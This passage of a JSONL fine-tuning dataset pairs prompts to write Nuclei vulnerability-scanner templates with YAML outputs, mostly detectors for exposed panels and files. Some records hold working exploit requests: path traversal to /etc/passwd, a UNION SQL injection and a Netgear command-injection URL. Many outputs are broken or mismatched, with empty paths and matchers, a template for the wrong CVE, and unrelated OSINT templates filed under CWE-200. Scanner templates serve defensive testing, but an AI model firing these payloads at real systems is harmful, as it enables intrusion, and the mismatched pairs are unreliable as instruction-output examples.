\" \n part: body_2\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "openplc-default-login"} +{"instruction": "Generate a Nuclei template for CVE-2021-20090", "input": "Title: Path Traversal in buffalo wsr-2533dhpl2-bk_firmware and others\nSummary: A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.\nVulnerability Type: Path Traversal\nSeverity: critical\nAffected Products: buffalo wsr-2533dhpl2-bk_firmware, buffalo wsr-2533dhp3-bk_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-20092\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Improper Access Control\n author: gy741,pdteam,parth\n severity: high\n description: The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\n tags: cve2021,cve,buffalo,firmware,iot,tenable,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"application/x-javascript\" \n part: header\n - type: word\n words:\n - \"/*DEMO*/\" \n - \"addCfg(\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-20090"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: steam\n\ninfo:\n name: Steam User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Steam user name information check was conducted.\n tags: osint,osint-gaming,steam,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://steamcommunity.com/id/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"g_rgProfileData =\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: visnesscard\n\ninfo:\n name: Visnesscard User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Visnesscard user name information check was conducted.\n tags: osint,osint-business,visnesscard,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://my.visnesscard.com/Home/GetCard/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"end_point\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Google ADK Development UI Exposure", "input": "Title: Google ADK Development UI Exposure\nSummary: Google ADK Development UI Exposure. Detects the exposure of the Google Agent Development Kit (ADK) Development UI, which may lead to sensitive information disclosure or unauthorized access.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: google-adk-webui-exposed\n\ninfo:\n name: Google ADK Development UI Exposure\n author: princechaddha\n severity: info\n description: Detects the exposure of the Google Agent Development Kit (ADK) Development UI, which may lead to sensitive information disclosure or unauthorized access.\n tags: adk,exposure,google,ai,agent,devops,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dev-ui/\" \n matchers:\n - type: word\n words:\n - \"Agent Development Kit Dev UI\" \n part: body", "category": "generic", "severity": "info", "id": "google-adk-webui-exposed"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: labkey-server-login\n\ninfo:\n name: LabKey Server Login Panel - Detect\n author: tess\n severity: info\n description: LabKey Server login panel was detected.\n tags: panel,labkey,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/labkey/home/login-login.view\" \n - \"{{BaseURL}}/login/home/login.view\" \n matchers:\n - type: word\n words:\n - \"TCTU LabKey Server: /home\" \n - \"Powered by LabKey\" \n part: body\n condition: or\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: WordPress Setup Configuration", "input": "Title: WordPress Setup Configuration\nSummary: WordPress Setup Configuration. Exposed Wordpress Setup Configuration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: wp-config-setup\n\ninfo:\n name: WordPress Setup Configuration\n author: princechaddha\n severity: high\n description: Exposed Wordpress Setup Configuration.\n tags: wordpress,setup,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/setup-config.php?step=1\" \n matchers:\n - type: word\n words:\n - \"Below you should enter your database connection details.\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "wp-config-setup"} +{"instruction": "Generate a Nuclei template for: UniGUI Server Monitor Panel - Exposure", "input": "Title: UniGUI Server Monitor Panel - Exposure\nSummary: UniGUI Server Monitor Panel - Exposure. Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: unigui-server-monitor-exposure\n\ninfo:\n name: UniGUI Server Monitor Panel - Exposure\n author: serrapa\n severity: low\n description: Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data.\n tags: exposure,unigui,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/server\" \n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: or", "category": "generic", "severity": "low", "id": "unigui-server-monitor-exposure"} +{"instruction": "Generate a Nuclei template for: Oracle Internet File System FTP Service - Detect", "input": "Title: Oracle Internet File System FTP Service - Detect\nSummary: Oracle Internet File System FTP Service - Detect. Oracle Internet File System FTP service was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: oracle-ifs-ftp-detect\n\ninfo:\n name: Oracle Internet File System FTP Service - Detect\n author: pussycat0x\n severity: info\n description: Oracle Internet File System FTP service was detected.\n tags: network,ftp,oracle,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "oracle-ifs-ftp-detect"} +{"instruction": "Generate a Nuclei template for: Espec Web Controller - Panel", "input": "Title: Espec Web Controller - Panel\nSummary: Espec Web Controller - Panel. Espec Web Controller panel was discovered.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: espec-web-controller-panel\n\ninfo:\n name: Espec Web Controller - Panel\n author: darses\n severity: info\n description: Espec Web Controller panel was discovered.\n tags: panel,espec,ics,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/version\" \n matchers:\n - type: word\n words:\n - \"Espec Web Controller\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "espec-web-controller-panel"} +{"instruction": "Generate a Nuclei template for CVE-2023-4568", "input": "Title: Authentication Bypass in papercut papercut_ng\nSummary: PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\nVulnerability Type: Authentication Bypass\nSeverity: medium\nAffected Products: papercut papercut_ng\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-4568\n\ninfo:\n name: PaperCut NG Unauthenticated XMLRPC Functionality\n author: DhiyaneshDK\n severity: medium\n description: PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n tags: cve2023,cve,unauth,papercut,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"conf.ssl-port\" \n - \"conf.auth-ttl-default\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/xml\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-4568"} +{"instruction": "Generate a Nuclei template for: aa-exec - Privilege Escalation", "input": "Title: aa-exec - Privilege Escalation\nSummary: aa-exec - Privilege Escalation. aa-exec is used to launch a program confined by the specified profile and or namespace.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-aa-exec\n\ninfo:\n name: aa-exec - Privilege Escalation\n author: daffainfo\n severity: high\n description: aa-exec is used to launch a program confined by the specified profile and or namespace.\n tags: code,linux,aa-exec,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-aa-exec"} +{"instruction": "Generate a Nuclei template for CVE-2019-2729", "input": "Title: Vulnerability (CWE-284) in oracle communications_diameter_signaling_router and others\nSummary: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\nVulnerability Type: Vulnerability (CWE-284)\nSeverity: critical\nAffected Products: oracle communications_diameter_signaling_router, oracle communications_network_integrity, oracle hyperion_infrastructure_technology\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-2729\n\ninfo:\n name: Oracle WebLogic Server Administration Console - Remote Code Execution\n author: igibanez\n severity: critical\n description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.\n tags: cve,cve2019,oracle,rce,weblogic,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2019-2729"} +{"instruction": "Generate a Nuclei template for: Haivision Gateway Login Panel - Detect", "input": "Title: Haivision Gateway Login Panel - Detect\nSummary: Haivision Gateway Login Panel - Detect. Haivision Gateway login panel was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: haivision-gateway-panel\n\ninfo:\n name: Haivision Gateway Login Panel - Detect\n author: righettod\n severity: info\n description: Haivision Gateway login panel was detected.\n tags: panel,haivision,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "haivision-gateway-panel"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: configure-service-timestamps-debug\n\ninfo:\n name: Cisco Configure Service Timestamps for Debug - Detect\n author: pussycat0x\n severity: info\n description: The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently.\n tags: file,audit,cisco,config-audit,cisco-switch,router\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2021-24226", "input": "Title: Information Disclosure in accessally accessally\nSummary: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required.\nVulnerability Type: Information Disclosure\nSeverity: high\nAffected Products: accessally accessally\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24226\n\ninfo:\n name: AccessAlly <3.5.7 - Sensitive Information Leakage\n author: dhiyaneshDK\n severity: high\n description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \\\"resource/frontend/product/product-shortcode.php\\\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,accessally,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"
\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2023-6549", "input": "Title: Buffer Overflow in citrix netscaler_application_delivery_controller and others\nSummary: Improper Restriction of Operations within the Bounds of a Memory Buffer in NetScaler ADC and NetScaler Gateway allows Unauthenticated Denial of Service and\u00a0Out-Of-Bounds Memory Read\n\nVulnerability Type: Buffer Overflow\nSeverity: high\nAffected Products: citrix netscaler_application_delivery_controller, citrix netscaler_gateway\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-6549\n\ninfo:\n name: Citrix Netscaler ADC & Gateway - Out-Of-Bounds Memory Read\n author: ice3man\n severity: critical\n description: The vulnerability would enable an attacker to remotely obtain sensitive information from a NetScaler appliance configured as a Gateway or AAA virtual server via a very commonly connected Web interface, and without requiring authentication. This bug is nearly identical to the Citrix Bleed vulnerability (CVE-2023-4966), except it is less likely to return highly sensitive information to an attacker.\n tags: cve,cve2023,citrix,netscaller,gateway,oob,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/nf/auth/webview/done\" \n - \"AuthenticationRequirements\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-6549"} +{"instruction": "Generate a Nuclei template for: ScrapingDog API Test", "input": "Title: ScrapingDog API Test\nSummary: ScrapingDog API Test. Proxy API for Web scraping. Tags: token-spray, scrapingdog\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-scrapingdog\n\ninfo:\n name: ScrapingDog API Test\n author: daffainfo\n severity: info\n description: Proxy API for Web scraping\n tags: token-spray,scrapingdog\n\nhttp:\n - method: GET\n path:\n - \"https://api.scrapingdog.com/scrape?api_key={{token}}&url=https://example.com/ip&dynamic=false\" \n matchers:\n - type: word\n words:\n - \"Example Domain\" \n part: body", "category": "generic", "severity": "info", "id": "api-scrapingdog"} +{"instruction": "Generate a Nuclei template for: Slow Query Log Disabled for MySQL Database Servers", "input": "Title: Slow Query Log Disabled for MySQL Database Servers\nSummary: Slow Query Log Disabled for MySQL Database Servers. Ensure that the \"slow_query_log\" database flag is enabled for your Google Cloud MySQL database instances in order to simplify the task of finding inefficient or time-consuming SQL queries for your MySQL databases. By default, the \"slow_query_log\" database flag is not enabled for Google Cloud MySQL instances.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-mysql-slowquerylog-disabled\n\ninfo:\n name: Slow Query Log Disabled for MySQL Database Servers\n author: princechaddha\n severity: medium\n description: Ensure that the \"slow_query_log\" database flag is enabled for your Google Cloud MySQL database instances in order to simplify the task of finding inefficient or time-consuming SQL queries for your MySQL databases. By default, the \"slow_query_log\" database flag is not enabled for Google Cloud MySQL instances.\n tags: cloud,devops,gcp,gcloud,google-cloud-sql,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-mysql-slowquerylog-disabled"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: gist\n\ninfo:\n name: Gist User Name Information - Detect\n author: philippedelteil\n severity: info\n description: Gist user name information check was conducted.\n tags: osint,osint-coding,gist,github,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://gist.github.com/{{user}}\" \n matchers:\n - type: word\n words:\n - \"p-nickname vcard-username d-block\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Yarn Lock File Disclosure", "input": "Title: Yarn Lock File Disclosure\nSummary: Yarn Lock File Disclosure. The yarn.lock file stores the versions of each Yarn dependency installed. It's a lock file for package.json.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: yarn-lock\n\ninfo:\n name: Yarn Lock File Disclosure\n author: oppsec,noraj\n severity: info\n description: The yarn.lock file stores the versions of each Yarn dependency installed. It's a lock file for package.json.\n tags: exposure,files,yarn,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/yarn.lock\" \n matchers:\n - type: word\n words:\n - \"# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.\" \n - \"# yarn lockfile v1\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "yarn-lock"} +{"instruction": "Generate a Nuclei template for: bloofoxCMS - Default Login", "input": "Title: bloofoxCMS - Default Login\nSummary: bloofoxCMS - Default Login. bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: bloofoxcms-default-login\n\ninfo:\n name: bloofoxCMS - Default Login\n author: theamanrawat\n severity: high\n description: bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.\n tags: bloofox,cms,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "bloofoxcms-default-login"} +{"instruction": "Generate a Nuclei template for: Cobalt Strike C2 - Detect", "input": "Title: Cobalt Strike C2 - Detect\nSummary: Cobalt Strike C2 - Detect. Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer's network.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cobalt-strike-c2\n\ninfo:\n name: Cobalt Strike C2 - Detect\n author: pussycat0x\n severity: info\n description: Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer's network.\n tags: c2,ssl,tls,ir,osint,malware,panel,cobalt-strike,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cobalt-strike-c2"} +{"instruction": "Generate a Nuclei template for: Netgear DGN Devices - Command Execution", "input": "Title: Netgear DGN Devices - Command Execution\nSummary: Netgear DGN Devices - Command Execution. This template checks for unauthenticated command execution vulnerability in Netgear DGN devices. Attackers can bypass authentication mechanisms and execute arbitrary commands with root privileges.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: netgear-dgn-rce\n\ninfo:\n name: Netgear DGN Devices - Command Execution\n author: 3th1c_yuk1\n severity: critical\n description: This template checks for unauthenticated command execution vulnerability in Netgear DGN devices. Attackers can bypass authentication mechanisms and execute arbitrary commands with root privileges.\n tags: rce,netgear,dgn,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo%20{{randstr}}&curpath=/¤tsetting.htm=1\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "critical", "id": "netgear-dgn-rce"} +{"instruction": "Generate a Nuclei template for CVE-2019-14312", "input": "Title: Path Traversal in aptana jaxer\nSummary: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: aptana jaxer\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-14312\n\ninfo:\n name: Aptana Jaxer 1.0.3.4547 - Local File inclusion\n author: daffainfo\n severity: medium\n description: Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.\n tags: cve2019,cve,lfi,edb,packetstorm,aptana,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2019-14312"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: bitrix-login\n\ninfo:\n name: Bitrix Login Panel\n author: juicypotato1,malwarework\n severity: info\n description: Bitrix24 is a unified work space that places a complete set of business tools into a single, intuitive interface.\n tags: panel,bitrix,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/bitrix/admin/\" \n - \"{{BaseURL}}/bitrix/components/bitrix/map.yandex.view/settings/settings.php\" \n matchers:\n - type: word\n words:\n - \"USER_LOGIN\" \n - \"/bitrix/js/main/\" \n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Discovering directories w/ NTLM", "input": "Title: Discovering directories w/ NTLM\nSummary: Discovering directories w/ NTLM. Tags: miscellaneous, misc, fuzz\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ntlm-directories\n\ninfo:\n name: Discovering directories w/ NTLM\n author: puzzlepeaches,incogbyte,missing0x00,incogbyte\n severity: info\n description: Discovering directories w/ NTLM\n tags: miscellaneous,misc,fuzz,windows,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - type: status\n status:\n - 401", "category": "generic", "severity": "info", "id": "ntlm-directories"} +{"instruction": "Generate a Nuclei template for CVE-2025-46819", "input": "Title: Vulnerability (CWE-190) in redis redis\nSummary: Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted LUA script to read out-of-bound data or crash the server and subsequent denial of service. The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2. To workaround this issue without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to block a script by restricting both the EVAL and FUNCTION command families.\nVulnerability Type: Vulnerability (CWE-190)\nSeverity: medium\nAffected Products: redis redis\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-46819\n\ninfo:\n name: Redis < 8.2.1 Lua Long-String Delimiter - Out-of-Bounds Read\n author: pussycat0x\n severity: high\n description: Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted LUA script to read out-of-bound data or crash the server and subsequent denial of service. The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2. To workaround this issue without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to block a script by restricting both the EVAL and FUNCTION command families.\n tags: cve,cve2025,js,redis,network,passive,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2025-46819"} +{"instruction": "Generate a Nuclei template for: Force Regenerate Thumbnails Detection", "input": "Title: Force Regenerate Thumbnails Detection\nSummary: Force Regenerate Thumbnails Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-force-regenerate-thumbnails\n\ninfo:\n name: Force Regenerate Thumbnails Detection\n author: ricardomaia\n severity: info\n description: Force Regenerate Thumbnails Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-force-regenerate-thumbnails"} +{"instruction": "Generate a Nuclei template for: BitBucket Client Secret", "input": "Title: BitBucket Client Secret\nSummary: BitBucket Client Secret. Tags: keys, file, bitbucket\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: bitbucket-client-secret\n\ninfo:\n name: BitBucket Client Secret\n author: DhiyaneshDK\n severity: info\n description: BitBucket Client Secret\n tags: keys,file,bitbucket,token\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "bitbucket-client-secret"} +{"instruction": "Generate a Nuclei template for CVE-2020-35736", "input": "Title: Path Traversal in liftoffsoftware gateone\nSummary: GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. directory traversal because os.path.join is misused.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: liftoffsoftware gateone\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-35736\n\ninfo:\n name: GateOne 1.1 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.\n tags: cve,cve2020,gateone,lfi,liftoffsoftware,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2020-35736"} +{"instruction": "Generate a Nuclei template for CVE-2021-24666", "input": "Title: SQL Injection in podlove podlove_podcast_publisher\nSummary: The Podlove Podcast Publisher WordPress plugin before 3.5.6 contains a 'Social & Donations' module (not activated by default), which adds the rest route '/services/contributor/(?P[\\d]+), takes an 'id' and 'category' parameters as arguments. Both parameters can be used for the SQLi.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: podlove podlove_podcast_publisher\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24666\n\ninfo:\n name: WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection\n author: theamanrawat\n severity: critical\n description: WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-\" \n matchers:\n - type: word\n words:\n - \"66a82937a7660b73b00d4f7cefee6c85\" \n - \"\"service_id\"\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-24666"} +{"instruction": "Generate a Nuclei template for CVE-2025-11371", "input": "Title: Vulnerability (CWE-552) in gladinet centrestack and others\nSummary: In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild.\u00a0\n\nThis issue impacts Gladinet CentreStack and Triofox: All versions prior to and including\u00a016.7.10368.56560\nVulnerability Type: Vulnerability (CWE-552)\nSeverity: high\nAffected Products: 